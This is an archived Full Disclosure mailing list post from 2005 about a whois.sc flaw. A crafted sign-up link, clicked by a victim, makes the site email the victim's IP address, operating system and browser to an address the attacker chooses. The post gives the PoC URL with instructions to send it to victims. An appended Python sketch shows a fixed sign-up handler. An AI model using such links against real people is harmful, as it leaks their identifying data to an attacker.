Full Disclosure mailing list archives
whois.sc not-big-deal hole (2nd post)
From: unknown unknown <unknown.pentester () gmail com>
Date: Thu, 3 Nov 2005 09:30:19 +0000
I just forgot to mention in the previous post that after the victim clicks on the specially-crafted link, the attacker should be able to receive an account sign-up email with the following information about the victim (located at the bottom of the email body):

- IP Address
- Operating system version
- Web browser version

The bottom of the email looks like this (some information has been hidden):

---------------------------------------------------
NOTE: You received this message because someone from X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X) Gecko/2005XXXX Firefox/X.X.X) requested an account for this email address. If you did not request this account please ignore this message and you will not be contacted again.
---------------------------------------------------

PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com

Replace "attacker%40gmail.com" in the previous link with your own email address (e.g.: myself%40gmail.com) and send it to the victim.

Note: the only limitation of this "trick" is that the attacker needs to use a different email address for each attack. This is because whois.sc will set the account activation status to "pending" after requesting the account activation for the first time.

Regards,
pagvac

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
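An added example, not part of the original post and not whois.sc's code: a sketch of how a sign-up handler can close the two conditions the post relies on (the account request fires from a clicked GET link, and the confirmation mail carries the requester's IP address and User-Agent). The function names, the form field csrf_token and the AUDIT_LOG list are hypothetical, and the sample addresses are constructed.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret (constructed here)
AUDIT_LOG = []  # hypothetical server-side store for requester metadata


def csrf_token(session_id: str) -> str:
    """Token bound to the visitor's session, embedded in the site's own form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_new_account(method, session_id, form, client_ip, user_agent):
    """Return (http_status, email_body); email_body is None when no mail is sent."""
    # 1. A state-changing action must not be reachable by following a link.
    if method != "POST":
        return 405, None
    # 2. The request must carry the token issued with the site's own form,
    #    so a page or link on another origin cannot submit it for the visitor.
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, csrf_token(session_id).encode()):
        return 403, None
    email = form.get("email", "")
    if "@" not in email:
        return 400, None
    # 3. Requester metadata stays in the server-side log for abuse handling;
    #    it is not copied into mail sent to an unverified address.
    AUDIT_LOG.append((email, client_ip, user_agent))
    body = (
        f"An account was requested for {email}.\n"
        "If you did not request this account please ignore this message.\n"
    )
    return 200, body


if __name__ == "__main__":
    sid = "session-abc"  # constructed session identifier
    ua = "Mozilla/5.0 (constructed)"
    # Link click as in the post: a GET carrying someone else's address.
    print(handle_new_account("GET", sid, {"email": "attacker@example.com"},
                             "203.0.113.7", ua))
    # Legitimate submission from the site's own form.
    form = {"email": "user@example.com", "csrf_token": csrf_token(sid)}
    print(handle_new_account("POST", sid, form, "203.0.113.7", ua))
```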